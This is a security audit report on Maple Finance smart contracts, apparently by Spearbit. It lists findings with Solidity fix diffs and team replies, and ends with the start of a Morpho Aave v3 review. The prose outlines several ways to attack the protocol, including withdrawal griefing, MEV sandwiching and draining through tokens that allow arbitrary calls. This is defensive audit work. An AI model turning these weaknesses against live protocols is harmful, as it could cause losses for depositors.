• Pause removed from Liquidator here: #55.
• Does the Loan now have the pause on migrate, or on upgrade like it was before? In current main, it's still on upgrade, but ok. Just making sure you're aware in case you intended to change that.

Maple: Yes, that change was intended, to have it on upgrade, as we won't be updating the Loan factory in production. We're fine with new loans being created during a protocol pause.

Spearbit: Fixed.

+5.3.12 Missing post-migration check in PoolManager.sol could result in lost funds

Severity: Low Risk
Context: pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L59-L62
Description: The protocol employs an upgradeable/migrateable system that includes upgradeable initializers for factory-created contracts. For the most part, a storage value that was left uninitialized due to an erroneous initializer would not affect protocol funds. For example, forgetting to initialize _locked would cause all nonReentrant functions to revert, but no funds would be lost. However, if the poolDelegateCover address were unset and depositCover() were called, the funds would be lost, as there is no to != address(0) check in transferFrom.
Recommendation: Consider adding an explicit check to the migrate() function:

 function migrate(address migrator_, bytes calldata arguments_) external override {
     require(msg.sender == _factory(),         "PM:M:NOT_FACTORY");
     require(_migrate(migrator_, arguments_),  "PM:M:FAILED");
+    require(poolDelegateCover != address(0),  "PM:M:DELEGATE_NOT_SET");
 }

Alternatively, consider adding a to != address(0) check to transferFrom() for more robust protection.

Maple: Fixed in #204.

Spearbit: Fixed.

+5.3.13 Globals.poolDelegates[delegate_].ownedPoolManager mapping can be overwritten

Severity: Low Risk
Context: globals-v2/MapleGlobals.sol#L112
Description: Globals.poolDelegates[delegate_].ownedPoolManager keeps track of a single pool manager for a pool delegate.
It can happen that the same pool delegate is registered for a second pool manager, and the mapping is overwritten, by calling PM.acceptPendingPoolDelegate -> Globals.transferOwnedPoolManager or Globals.activatePoolManager.
Recommendation: Consider checking that the pool delegate does not own a pool manager yet.

 function activatePoolManager(address poolManager_) external override isGovernor {
     address delegate_ = IPoolManagerLike(poolManager_).poolDelegate();
+    require(poolDelegates[delegate_].ownedPoolManager == address(0), "MG:APM:ALREADY_OWNS");
     emit PoolManagerActivated(poolManager_, delegate_);
     poolDelegates[delegate_].ownedPoolManager = poolManager_;
 }

 function transferOwnedPoolManager(address fromPoolDelegate_, address toPoolDelegate_) external override {
     PoolDelegate storage fromDelegate_ = poolDelegates[fromPoolDelegate_];
     PoolDelegate storage toDelegate_   = poolDelegates[toPoolDelegate_];

     require(fromDelegate_.ownedPoolManager == msg.sender, "MG:TOPM:NOT_AUTHORIZED");
     require(toDelegate_.isPoolDelegate,                   "MG:TOPM:NOT_POOL_DELEGATE");
+    require(toDelegate_.ownedPoolManager == address(0),   "MG:TOPM:ALREADY_OWNS");

     fromDelegate_.ownedPoolManager = address(0);
     toDelegate_.ownedPoolManager   = msg.sender;

     emit PoolManagerOwnershipTransferred(fromPoolDelegate_, toPoolDelegate_, msg.sender);
 }

Maple: Fixed in #38.

Spearbit: Fixed.

+5.3.14 Pool withdrawals can be kept low by non-redeeming users

Severity: Low Risk
Context: withdrawal-manager::WithdrawalManager.sol#L331
Description: In the current pool design, users request to exit the pool and are scheduled for a withdrawal window in the withdrawal manager. If the pool does not have enough liquidity, their share of the available pool liquidity is proportionate to the total shares of all users who requested to withdraw in that withdrawal window. It's possible for griefers to keep the withdrawals artificially low by requesting a withdrawal but not actually withdrawing during the withdrawal window. These griefers are not penalized, but their behavior leads to worse withdrawal amounts for every other honest user.
Recommendation: There's no straightforward solution in the current design of the withdrawal process. Short-term, monitor the withdrawal situation for this issue. Long-term, consider enforcing withdrawals during the withdrawal window or penalizing withdrawers that requested a withdrawal but did not withdraw.

Maple: Yes, we are aware of this and discussed it during our design phase. We will continuously evaluate this over time and determine if a WM upgrade with an alternative design is necessary.

Spearbit: Acknowledged.

+5.3.15 _getCollateralRequiredFor should round up

Severity: Low Risk
Context: loan::MapleLoan.sol#L700
Description: _getCollateralRequiredFor rounds down the collateral that is required from the borrower. This benefits the borrower.
Recommendation: Consider rounding up:

- (collateralRequired_ * (principal_ - drawableFunds_)) / principalRequested_
+ (collateralRequired_ * (principal_ - drawableFunds_) + principalRequested_ - 1) / principalRequested_

Maple: Fixed in #243.

Spearbit: Fixed.

5.4 Gas Optimization

+5.4.1 Use the cached variable in makePayment

Severity: Gas Optimization
Context: loan (v4.0.0-rc.1)::MapleLoan.sol#L185
Description: The claim function is called using _nextPaymentDueDate instead of nextPaymentDueDate_.
Recommendation: The cached nextPaymentDueDate_ variable should be used to save gas.
- ILenderLike(_lender).claim(principal_, interest_, previousPaymentDueDate_, _nextPaymentDueDate);
+ ILenderLike(_lender).claim(principal_, interest_, previousPaymentDueDate_, nextPaymentDueDate_);

Maple: Fixed in #237.

Spearbit: Fixed.

+5.4.2 No need to explicitly initialize variables with default values

Severity: Gas Optimization
Context: pool-v2 (v1.0.0-rc.1)::LoanManager.sol#L367, pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L196
Description: By default, the value of a variable is set to 0 for uint, false for bool, address(0) for address, etc. Explicitly initializing/setting a variable to its default value wastes gas.
Recommendation: In LoanManager.sol, it is recommended to remove line 367:

- liquidationComplete_ = false;

In PoolManager.sol:

- uint256 i_ = 0;
+ uint256 i_;

Maple: Fixed in #193.

Spearbit: Fixed.

+5.4.3 Cache calculation in getExpectedAmount

Severity: Gas Optimization
Context: pool-v2 (v1.0.0-rc.1)::LoanManager.sol#L850, pool-v2 (v1.0.0-rc.1)::LoanManager.sol#L853
Description: The decimal precision calculation is used twice in the getExpectedAmount function; caching it in a new variable would save some gas.
Recommendation: Follow the code below to fix this issue:

- uint8 collateralAssetDecimals_ = IERC20Like(collateralAsset_).decimals();
+ uint256 collateralAssetDecimals_ = uint256(10) ** uint256(IERC20Like(collateralAsset_).decimals());

  uint256 oracleAmount =
      swapAmount_
          * IMapleGlobalsLike(globals_).getLatestPrice(collateralAsset_)  // Convert from `fromAsset` value.
          * uint256(10) ** uint256(IERC20Like(fundsAsset).decimals())     // Convert to `toAsset` decimal precision.
          * (HUNDRED_PERCENT - allowedSlippageFor[collateralAsset_])      // Multiply by allowed slippage basis points.
          / IMapleGlobalsLike(globals_).getLatestPrice(fundsAsset)        // Convert to `toAsset` value.
-         / uint256(10) ** uint256(collateralAssetDecimals_)              // Convert from `fromAsset` decimal precision.
+         / collateralAssetDecimals_                                      // Convert from `fromAsset` decimal precision.
          / HUNDRED_PERCENT;                                              // Divide basis points for slippage.

- uint256 minRatioAmount = (swapAmount_ * minRatioFor[collateralAsset_]) / (uint256(10) ** collateralAssetDecimals_);
+ uint256 minRatioAmount = (swapAmount_ * minRatioFor[collateralAsset_]) / collateralAssetDecimals_;

Maple: Fixed in #194.

Spearbit: Fixed.

+5.4.4 For-Loop Optimization

Severity: Gas Optimization
Context: pool-v2::TransitionLoanManager.sol#L103, pool-v2::TransitionLoanManager.sol#L111, pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L542, pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L595
Description: The for-loop can be optimized in 4 ways:
1. Removing the initialization of the loop counter if the value is 0 by default.
2. Caching the array length outside the loop.
3. Prefix increment (++i) instead of postfix increment (i++).
4. Unchecked increment.

- for (uint256 i_ = 0; i_ < loans_.length; i_++) {
+ uint256 length = loans_.length;
+ for (uint256 i_; i_ < length; ) {
      ...
+     unchecked { ++i_; }
  }

Recommendation: Optimize the for-loops.

Maple: Fixed in #195.

Spearbit: There is one more optimization in the PR:

- for (uint256 i_ = 0; i_ < length_;) {
+ for (uint256 i_; i_ < length_;) {

Maple: Updated in #221.

Spearbit: Fixed.

+5.4.5 Pool._divRoundUp can be more efficient

Severity: Gas Optimization
Context: pool-v2::Pool.sol#L195
Description: The gas cost of Pool._divRoundUp can be reduced in the context that it's used in.
Recommendation: Consider changing it to:

 function _divRoundUp(uint256 numerator_, uint256 divisor_) internal pure returns (uint256 result_) {
-    result_ = (numerator_ / divisor_) + (numerator_ % divisor_ > 0 ? 1 : 0);
+    result_ = (numerator_ + divisor_ - 1) / divisor_;
 }

Maple: Fixed in #201.

Spearbit: Fixed.

+5.4.6 Liquidator uses different reentrancy guards than rest of codebase

Severity: Gas Optimization
Context: liquidations::Liquidator.sol#L28
Description: All other reentrancy guards of the codebase use the values 1/2 instead of 0/1 to indicate NOT_LOCKED/LOCKED.
Recommendation: Consider using the 1/2 values as well, for gas efficiency reasons and to unify the codebase. It's important to then update the LiquidatorInitializer._initialize function and set the guard to the non-zero NOT_LOCKED value.

Maple: Fixed in #52.

Spearbit: Fixed.

+5.4.7 Use block.timestamp instead of domainStart in removeLoanImpairment

Severity: Gas Optimization
Context: pool-v2::LoanManager.sol#L291
Description: The removeLoanImpairment function adds back all interest from the payment's start date to domainStart. The _advanceGlobalPaymentAccounting function sets domainStart to block.timestamp.
Recommendation: Consider accruing the interest from paymentInfo_.startDate to block.timestamp directly, to make the code easier to understand and as a gas improvement.

  // Discretely update missing interest as if payment was always part of the list.
  _updateIssuanceParams(
      issuanceRate + paymentInfo_.issuanceRate,
-     accountedInterest + _uint112(_getPaymentAccruedInterest(paymentInfo_.startDate, domainStart, paymentInfo_.issuanceRate, paymentInfo_.refinanceInterest))
+     accountedInterest + _uint112(_getPaymentAccruedInterest(paymentInfo_.startDate, block.timestamp, paymentInfo_.issuanceRate, paymentInfo_.refinanceInterest))
  );

Maple: Fixed in #206.

Spearbit: Fixed.

+5.4.8 setTimelockWindows checks isGovernor multiple times

Severity: Gas Optimization
Context: globals-v2/MapleGlobals.sol#L241-L246
Description: The Globals.setTimelockWindows function calls setTimelockWindow in a loop, and each time setTimelockWindow's isGovernor modifier is checked.
Recommendation: Only check isGovernor once to optimize the function. Consider creating and calling an internal _setTimelockWindow function that does not apply this modifier.

Maple: Fixed in #39.

Spearbit: Fixed, just a potential cleanup: setTimelockWindow could also call the internal _setTimelockWindow.

+5.4.9 fullDaysLate computation can be optimized

Severity: Gas Optimization
Context: loan::MapleLoan.sol#L843
Description: The fullDaysLate computation can be optimized.
Recommendation: Consider changing it to:

- (((currentTime_ - nextPaymentDueDate_ - 1) / 1 days) + 1) * 1 days
+ ((currentTime_ - nextPaymentDueDate_ + (1 days - 1)) / 1 days) * 1 days

Both expressions round the lateness up to whole days (e.g. being 1.5 days late yields 2 days), but the optimized form uses fewer operations.

Maple: Fix PR added: #248.

Spearbit: Fixed.

5.5 Informational

+5.5.1 Users can prevent repossessed funds from being claimed

Severity: Informational
Context: debt-locker::DebtLocker.sol#L325-L329
Description: The DebtLocker.sol contract determines an active liquidation by the following two conditions:
• The _liquidator state variable is a non-zero address.
• The current balance of the _liquidator contract is non-zero.
If an arbitrary user sends 1 wei of funds to the liquidator's address, the borrower will be unable to claim repossessed funds, as seen in the _handleClaimOfRepossessed() function. While the scope of the audit only covered the diff between v3.0.0 and v4.0.0-rc.0, the audit team decided it was important to include this as an informational issue.
The Maple team will be addressing this in their V2 release.
Recommendation: Consider using collateralRemaining as an indicator for when a liquidation has finished.

Maple: Acknowledged; won't address, because DebtLockers are getting deprecated upon launch and migration.

Spearbit: Acknowledged.

+5.5.2 MEV whenever totalAssets jumps

Severity: Informational
Context: pool-v2::Pool.sol#L278, pool-v2::Pool.sol#L275
Description: An attack users can attempt in order to capture large interest payments is sandwiching a payment with a deposit and a withdrawal. The current codebase tries to mostly eliminate this attack by:
• Optimistically assuming the next interest payment will be paid back, and accruing the interest payment linearly over the payment interval.
• Adding a withdrawal period.
However, there are still circumstances where totalAssets increases by a large amount at once:
• Users paying back their payment early. The jump in totalAssets will be paymentAmount - timeElapsedSincePaymentStart / paymentInterval * paymentAmount.
• Users paying back their entire loan early (closeLoan).
• Late payments increase it by the late interest fees and the accrued interest for the next payment from its start date to now.
Recommendation: These opportunities are rather rare and hard to completely mitigate, because they are under the borrower's control. In a future version of the protocol, consider streaming single large interest payments to the pool over a certain time.

Maple: We are aware that it is possible, but with our accounting mechanism for the LoanManager, the WithdrawalManager, and sufficient diversification in the loan portfolio, this issue will be very minor in terms of percent value change. We acknowledge and will not address.

Spearbit: Acknowledged.

+5.5.3 Use ERC20Helper approve() as best practice

Severity: Informational
Context: loan (v4.0.0-rc.1)::LoanManager.sol#L317
Description: The ERC20 approve function is used on fundsAsset in fundLoan() to approve the max amount, which does not check the return value.
Recommendation: Use ERC20Helper approve() as a best practice.

Maple: Fixed in #236.

Spearbit: Fixed.

+5.5.4 Additional verification in removeLoanImpairment

Severity: Informational
Context: pool-v2::LoanManager.sol#L266
Description: Currently, if removeLoanImpairment is called after the loan's original due date, there will be no issues, because the loan's removeLoanImpairment function will revert. It would be good to add a comment about this logic or to duplicate the check explicitly in the loan manager. If the loan implementation is upgraded in the future to have a non-reverting removeLoanImpairment function, then the loan manager as-is would account for the interest incorrectly.
Recommendation: Consider adding a comment to the loan manager such as:

+ // NOTE: This call will revert if we are past the original due date
  IMapleLoanLike(loan_).removeLoanImpairment();

Also, consider duplicating the check explicitly in the loan manager.

Maple: Fixed in #192.

Spearbit: Fixed.

+5.5.5 Can check msg.sender != collateralAsset/fundsAsset for extra safety

Severity: Informational
Context: liquidations (v2.0.0-rc.1)::Liquidator.sol#L93
Description: Some old ERC tokens (e.g. the Sandbox's SAND token) allow arbitrary calls from the token address itself. This odd behavior is usually a result of implementing the ERC677 approveAndCall and transferAndCall functions incorrectly. With these tokens, it is technically possible for the low-level msg.sender.call(...)
in the liquidator to execute arbitrary code on one of the tokens, which could let an attacker drain the funds.
Recommendation: Although it is very unlikely for Maple to whitelist one of these tokens as the collateral/funds asset, consider adding an explicit check to the liquidatePortion function:

+ require(msg.sender != collateralAsset && msg.sender != fundsAsset);

It is also recommended to keep this in mind when whitelisting future tokens.

Maple: Fixed in #51.

Spearbit: Fixed.

+5.5.6 IERC4626 Implementation of preview and max functions

Severity: Informational
Context: IERC4626.previewWithdraw(), IERC4626.previewDeposit(), IERC4626.previewMint(), IERC4626.previewRedeem()
Description: For the preview functions, EIP-4626 states: "MAY revert due to other conditions that would also cause the deposit [mint/redeem, etc.] to revert." But the comments in the interface currently state: "MUST NOT revert." In addition to the comments, there is the actual behavior of the preview functions. A commonly accepted interpretation of the standard is that these preview functions should revert in the case of conditions such as protocolPaused, !active, !openToPublic, totalAssets > liquidityCap, etc. The argument basically states that the max functions should return 0 under such conditions, and the preview functions should revert whenever the amount exceeds the max.
Recommendation: At a minimum, consider clarifying the NatSpec. Also, carefully consider the behavior of the preview functions. As an early adopter of 4626, decisions by Maple now could have ripple effects on the industry.

Maple: Fixed in #51.

Spearbit: The team decided to return 0 for the preview* functions instead of reverting. There's a bug in the PR (#51#discussion_r1020201462): previewWithdraw also always returns 0, but it should be possible to call withdraw in a way that returns non-zero assets. See "Pool.previewWithdraw always reverts but Pool.withdraw can succeed" for a related issue about unifying the behavior of these two functions. Did you decide not to account for protocolPaused and _canDeposit() in the preview/max functions?

Maple: We merged a fix for what you mentioned with PR #53. We decided not to have any reverts for the preview functions, as we believe that would be better for integrators. Also, the spec states "MAY revert" in those conditions, such as a protocol pause, so we believe we are still in spec if we choose not to revert.

Spearbit: That should be ok. There is so much ambiguity in the standard that I think it's fine to make this judgment call, which reduces complexity in the code of integrators. One small nit: you may want to consider updating the NatSpec on the preview functions in the interface, as mentioned in #68#issue-1435405355. It says "MUST NOT REVERT" but the standard says "MAY REVERT", so I could see some confusion around that. You could either change it to "MAY REVERT", write something like "Maple has decided that these will not revert", or even just delete the line that says "MUST NOT REVERT" on the preview() functions to eliminate any future confusion.

Maple: Acknowledged, we'll make the update and come back to you folks. Fixed in #226.

Spearbit: Fixed.

+5.5.7 Set domainEnd correctly in intermediate _advanceGlobalPaymentAccounting steps

Severity: Informational
Context: pool-v2::LoanManager.sol#L675
Description: In the _advanceGlobalPaymentAccounting function, domainEnd is set to payments[paymentWithEarliestDueDate].paymentDueDate, which is possibly zero if the last payment has just been accrued past.
This is currently not an issue, because in this scenario domainEnd would never be used before it is set back to its correct value in _updateIssuanceParams. However, for increased readability, it is recommended to prevent this odd intermediate state from ever occurring.
Recommendation: In _advanceGlobalPaymentAccounting, copy the same logic that _updateIssuanceParams has for setting domainEnd:

- domainEnd_ = payments[paymentWithEarliestDueDate].paymentDueDate;
+ domainEnd_ = paymentWithEarliestDueDate == 0
+     ? _uint48(block.timestamp)
+     : payments[paymentWithEarliestDueDate].paymentDueDate;

Maple: Fixed in #190.

Spearbit: Fixed.

+5.5.8 Replace hard-coded value with PRECISION constant

Severity: Informational
Context: pool-v2::LoanManager.sol#L468
Description: The constant PRECISION is equal to 1e30. The hard-coded value 1e30 is used in the _queueNextPayment function, where it can be replaced by PRECISION.
Recommendation: Change 1e30 to PRECISION:

- uint256 incomingNetInterest_ = newRate_ * (nextPaymentDueDate_ - startDate_) / 1e30;      // NOTE: Use issuanceRate to capture rounding errors.
+ uint256 incomingNetInterest_ = newRate_ * (nextPaymentDueDate_ - startDate_) / PRECISION; // NOTE: Use issuanceRate to capture rounding errors.

Maple: Fixed in #191.

Spearbit: Fixed.

+5.5.9 Use of floating pragma version

Severity: Informational
Context: globals-v2 (v1.0.0-rc.0)::Interfaces.sol#L2, globals-v2 (v1.0.0-rc.0)::IMapleGlobals.sol#L2
Description: Contracts should be deployed using a fixed pragma version. Locking the pragma helps to ensure that contracts do not accidentally get deployed using, for example, an outdated compiler version that might introduce bugs that affect the contract system negatively.
Recommendation: Lock the pragma version, and also consider upgrading the project pragma version to a newer stable version, currently 0.8.7.

Maple: PR for the fix: #37.

Spearbit: Fixed.

+5.5.10 PoolManager has low-level shares computation logic

Severity: Informational
Context: pool-v2::PoolManager.sol#L570, pool-v2::PoolManager.sol#L578
Description: The PoolManager has low-level shares computation logic that should ideally only be in the ERC4626 Pool, to separate the concerns.
Recommendation: Consider refactoring the PoolManager to call functions on the Pool instead:

maxMint:

 function maxMint(address receiver_) external view virtual override returns (uint256 maxShares_) {
     uint256 totalAssets_ = totalAssets();
     uint256 maxAssets_   = _getMaxAssets(receiver_, totalAssets_);
-    uint256 totalSupply_ = IPoolLike(pool).totalSupply();
-    maxShares_ = totalSupply_ == 0 ? maxAssets_ : maxAssets_ * totalSupply_ / totalAssets_;
+    maxShares_ = pool.previewDeposit(maxAssets_);
 }

maxWithdraw:

 function maxWithdraw(address owner_) external view virtual override returns (uint256 maxAssets_) {
     uint256 lockedShares_ = IWithdrawalManagerLike(withdrawalManager).lockedShares(owner_);
     uint256 maxShares_    = IWithdrawalManagerLike(withdrawalManager).isInExitWindow(owner_) ? lockedShares_ : 0;
-    maxAssets_ = maxShares_ * (totalAssets() - unrealizedLosses()) / IPoolLike(pool).totalSupply();
+    maxAssets_ = pool.convertToExitAssets(maxShares_);
 }

 // in Pool, add this function
+ function convertToExitAssets(uint256 shares_) public view override returns (uint256 assets_) {
+     assets_ = shares_ * (totalAssets() - unrealizedLosses()) / totalSupply;
+ }

Maple: Fixed in #208.

Spearbit: Fixed.
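To make the exit-share pricing above concrete, here is a sketch of the conversion in isolation (a hypothetical stand-alone contract; the state variables stand in for the real pool's accounting):

pragma solidity ^0.8.7;

// Hypothetical, stripped-down pool illustrating the exit conversion that the
// recommendation above moves into the ERC4626 Pool. Not Maple's actual code.
contract ExitConversionSketch {
    uint256 public totalSupply;       // total pool shares outstanding
    uint256 public totalAssetsValue;  // stand-in for totalAssets()
    uint256 public unrealizedLosses;  // losses recognized but not yet realized

    constructor(uint256 supply_, uint256 assets_, uint256 losses_) {
        totalSupply      = supply_;
        totalAssetsValue = assets_;
        unrealizedLosses = losses_;
    }

    // Exit conversions price shares against (totalAssets - unrealizedLosses),
    // so an exiting user bears their proportional part of unrealized losses.
    // E.g. 1,000 total shares, 2,000 assets, 500 unrealized losses:
    // 100 shares => 100 * (2,000 - 500) / 1,000 = 150 assets.
    function convertToExitAssets(uint256 shares_) public view returns (uint256 assets_) {
        assets_ = shares_ * (totalAssetsValue - unrealizedLosses) / totalSupply;
    }
}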
+5.5.11 Add additional checks to prevent refinancing/funding a closed loan

Severity: Informational
Context: pool-v2::PoolManager.sol#L432
Description: It's important that an already liquidated loan is not reused by refinancing or funding it again, as it would break a second liquidation when the second liquidator contract is deployed with the same arguments and salt.
Recommendation: Consider explicitly checking for this scenario in the PoolManager._validateAndFundLoan function. After closeLoan, making the last payment with makePayment, or a liquidation's repossess call, _clearLoanAccounting is called. For example, check that the loan's _paymentsRemaining is not zero.

Maple: Fixed in #203.

Spearbit: Fixed.

+5.5.12 PoolManager.removeLoanManager errors with out-of-bounds if loan manager not found

Severity: Informational
Context: pool-v2::PoolManager.sol#L188
Description: PoolManager.removeLoanManager errors with an out-of-bounds error if the loan manager is not found.
Recommendation: Consider reverting with a more expressive error:

 function removeLoanManager(address loanManager_) external override {
     _whenProtocolNotPaused();
     require(msg.sender == poolDelegate, "PM:RLM:NOT_PD");
+    require(isLoanManager[loanManager_], "PM:RLM:INVALID_LM");
     ...
 }

Maple: Fixed in #196.

Spearbit: Fixed.

+5.5.13 PoolManager.removeLoanManager does not clear loanManagers mapping

Severity: Informational
Context: pool-v2::PoolManager.sol#L188
Description: PoolManager.removeLoanManager does not clear the reverse loanManagers[mapleLoan] = loanManager mapping.
Recommendation: In the current version there's no efficient way to enumerate all mapleLoans that have the removed loanManager set. As this function is just a contingency function, consider simply providing the loans to be cleared as an additional argument.

Maple: Acknowledged, will need team discussion on whether we implement this. Fixed in #212.

Spearbit: The loanManagers field has been removed from the PM. The loan -> loanManager mapping is now resolved by calling loan.lender() on verified loans. Note that when the loan manager is removed by removeLoanManager, loans will still return the removed loan manager through loan.lender(). I'll assume that this is indeed the desired behavior for now and set this to fixed.

+5.5.14 Pool._requestRedeem reduces the wrong approval amount

Severity: Informational
Context: pool-v2::Pool.sol#L213
Description: The requestRedeem function transfers escrowShares_ from the owner but reduces the approval by shares_. Note that in the current code these values are the same, but for future PoolManager upgrades this could change.
Recommendation: Reduce the approval by escrowShares_.

Maple: Fixed in #202.

Spearbit: Fixed.

+5.5.15 Issuance rate for double-late claims does not need to be updated

Severity: Informational
Context: pool-v2::LoanManager.sol#L223
Description: The previousRate_ for the 8c) case in claim is always zero because the payment is late (!onTimePayment_), so the subtraction can be removed. I'd suggest removing the subtraction here as it's confusing.
Recommendation: The first payment's IR was reduced in _advanceGlobalPaymentAccounting; the newly scheduled payment that is also past the due date never increased the IR. For readability, consider changing the code to:

// 8c. If the current timestamp is greater than the RESULTING `nextPaymentDueDate`, then the next
//     payment must be FULLY accounted for, and the new payment must be removed from the sorted list.
//     Payment `issuanceRate` is used for this calculation as the issuance has occurred in isolation and
//     entirely in the past. All interest from the aggregate issuance rate has already been accounted for
//     in `_advanceGlobalPaymentAccounting`.
else {
    ( uint256 accountedInterestIncrease_, ) = _accountToEndOfPayment(paymentIdOf[msg.sender], newRate_, previousPaymentDueDate_, nextPaymentDueDate_);

    return _updateIssuanceParams(
-       issuanceRate - previousRate_,
+       issuanceRate,
        accountedInterest + _uint112(accountedInterestIncrease_)
    );
}

Maple: Fixed in #199.

Spearbit: Fixed.

+5.5.16 Additional verification that paymentIdOf[loan_] is not 0

Severity: Informational
Context: pool-v2::LoanManager.sol
Description: Most functions in the loan manager use the value paymentIdOf[loan_] without first checking if it's the default value of 0. Anyone can pay off a loan at any time to cause the claim function to set paymentIdOf[loan_] to 0, so even the privileged functions could be front-run to be called on a loan with a paymentIdOf of 0. This is not an issue in the current codebase, because each function would revert for some other reason, but it is recommended to add an explicit check so future upgrades of other modules don't turn this into a more serious issue.
Recommendation: Each time paymentIdOf[loan_] is used in a function, ensure that the value is non-zero before proceeding.

Maple: Fixed in #207.

Spearbit: Looks good to me; one question about this error string: not sure why it's IL (impairLoan?) when it's called in _handleXYZ. Fixed.

+5.5.17 LoanManager redundant check on late payment

Severity: Informational
Context: pool-v2::LoanManager.sol#L208
Description: The claim function has a check for block.timestamp > previousPaymentDueDate_ && block.timestamp <= nextPaymentDueDate_ in one of the if statements. The payment is already known to be late at this point in the code, so block.timestamp > previousPaymentDueDate_ is always true.
Recommendation: Consider removing the redundant part of the check for increased readability and a small gas saving:

- if (block.timestamp > previousPaymentDueDate_ && block.timestamp <= nextPaymentDueDate_) {
+ if (block.timestamp <= nextPaymentDueDate_) {

Maple: Fixed in #198.

Spearbit: Fixed.

+5.5.18 Add encodeArguments/decodeArguments to WithdrawalManagerInitializer

Severity: Informational
Context: withdrawal-manager::WithdrawalManagerInitializer.sol, pool-v2 (v1.0.0-rc.1)::PoolDeployer.sol#L68
Description: Unlike the other initializers, WithdrawalManagerInitializer.sol does not have public encodeArguments/decodeArguments functions, and PoolDeployer needs to be changed to use these functions correctly.
Recommendation: Consider adding these functions and using them in PoolDeployer:

 // PoolDeployer.sol
 function deployPool(...) external override returns (...) {
     ...
     // Deploy Withdrawal Manager
-    arguments = abi.encode(pool_, configParams_[3], configParams_[4]);
+    arguments = IWithdrawalManagerInitializerLike(initializers_[2]).encodeArguments(pool_, configParams_[3], configParams_[4]);

     withdrawalManager_ = IMapleProxyFactory(factories_[2]).createInstance(arguments, salt_);
     ...
 }

Maple: Fixed in #205 and #49.

Spearbit: Fixed.
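For reference, the public encode/decode pair such an initializer would expose typically looks like the following sketch (a hypothetical contract mirroring the abi.encode(pool_, configParams_[3], configParams_[4]) call above; the parameter names are illustrative, not Maple's actual interface):

pragma solidity ^0.8.7;

// Minimal sketch of an initializer exposing its argument encoding. The shape
// and the parameter names (cycleDuration_/windowDuration_) are illustrative.
contract InitializerArgsSketch {
    function encodeArguments(address pool_, uint256 cycleDuration_, uint256 windowDuration_)
        external pure returns (bytes memory encodedArguments_)
    {
        encodedArguments_ = abi.encode(pool_, cycleDuration_, windowDuration_);
    }

    function decodeArguments(bytes calldata encodedArguments_)
        external pure returns (address pool_, uint256 cycleDuration_, uint256 windowDuration_)
    {
        (pool_, cycleDuration_, windowDuration_) = abi.decode(encodedArguments_, (address, uint256, uint256));
    }
}

Exposing the pair keeps the argument layout defined in one place, so callers like PoolDeployer cannot silently drift out of sync with the initializer's decoding.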
+5.5.19 Reorder WM.processExit parameters

Severity: Informational
Context: withdrawal-manager::WithdrawalManager.sol#L210
Description: All other WM and Pool function signatures start with (uint256 shares/assets, address owner) parameters, but WM.processExit has its parameters reversed (address, uint256).
Recommendation: Consider reordering the parameters for consistency and renaming the account_ parameter to owner_.

Maple: Fixed in #48.

Spearbit: We only have visibility into the PR for the WM, but it should require changes in the pool module. Do you have the PR for the pool module?

Maple: The accompanying PR on pools-v2: #217.

Spearbit: Fixed.

+5.5.20 Additional verification in MapleLoanInitializer

Severity: Informational
Context: loan::MapleLoanInitializer.sol#L87
Description: The MapleLoanInitializer could verify additional arguments to avoid bad pool deployments.
Recommendation: Consider verifying:

require(IMapleGlobalsLike(globals_).isPoolAsset(assets_[1]), "");
require(_paymentInterval > 0, "");
require(_paymentsRemaining > 0, "");

Maple: Fixed in #244.

Spearbit: Fixed.

+5.5.21 Clean up updatePlatformServiceFee

Severity: Informational
Context: loan::MapleLoanFeeManager.sol#L109-L110
Description: updatePlatformServiceFee can be cleaned up to use an existing helper function.
Recommendation: Consider changing the code to:

 function updatePlatformServiceFee(uint256 principalRequested_, uint256 paymentInterval_) external override {
-    uint256 platformServiceFeeRate_ = IMapleGlobalsLike(globals).platformServiceFeeRate(_getPoolManager(msg.sender));
-    uint256 platformServiceFee_     = principalRequested_ * platformServiceFeeRate_ * paymentInterval_ / 365 days / HUNDRED_PERCENT;
+    uint256 platformServiceFee_ = getPlatformServiceFeeForPeriod(msg.sender, principalRequested_, paymentInterval_);

     platformServiceFee[msg.sender] = platformServiceFee_;

     emit PlatformServiceFeeUpdated(msg.sender, platformServiceFee_);
 }

Maple: Fixed in #242.

Spearbit: Fixed.

+5.5.22 Document restrictions on Refinancer

Severity: Informational
Context: loan::MapleLoan.sol#L290, loan::Refinancer.sol
Description: A refinancer may not set unexpected storage slots, like changing _fundsAsset, because _drawableFunds and _refinanceInterest are still measured in the old funds asset.
Recommendation: The provided Refinancer does indeed not allow this, but in theory any refinancer can be used. It's good to document restrictions on Refinancers, or even enforce them in code by doing pre/post checks.

Maple: Addressed in Refinancing.

Spearbit: The docs mention it, so consider this fixed: "Note that the Refinancer contract should never set the collateralAsset or fundsAsset and should never directly set drawableFunds, principal or collateral." The documentation still talks about the DebtLocker, which seems outdated: "This call is permissioned in the DebtLocker to only be called by the PoolDelegate."

+5.5.23 Typos / Incorrect documentation

Severity: Informational
Context: See below.
Description: The code and comments contain typos or are sometimes incorrect.
Recommendation: Consider fixing the typos:
• loan::MapleLoan.sol#L93: "to be transfer" => "to be transferred".
• withdrawal-manager::WithdrawalManager.sol#L222: The comment is incorrect; it only transfers the redeemable shares. "Transfer both returned shares and redeemable shares, burn only the redeemable shares in the pool." => "Transfer redeemable shares, burn the redeemable shares in the pool, relock remaining shares."

Maple: Fixed in #241 and #47.

Spearbit: Fixed.
diff --git a/findings_newupdate/spearbit/Morpho-Av3-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Morpho-Av3-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..90d6433
--- /dev/null
+++ b/findings_newupdate/spearbit/Morpho-Av3-Spearbit-Security-Review.txt
@@ -0,0 +1,36 @@
+5.1.1 Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and "pure" supply), borrow and liquidate

Severity: Critical Risk
Context: PositionsManager.sol#L120-L121, PositionsManager.sol#L180, PositionsManager.sol#L213, PositionsManager.sol#L261
Description: When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, operations could revert:
1) Withdraw: if the asset withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0.
2) Transfer: if the from address is using the asset as collateral and is borrowing something, and the asset transferred is an AToken with LTV > 0, the operation will revert.
3) Setting the reserve of an AToken as non-collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0, the operation will revert.
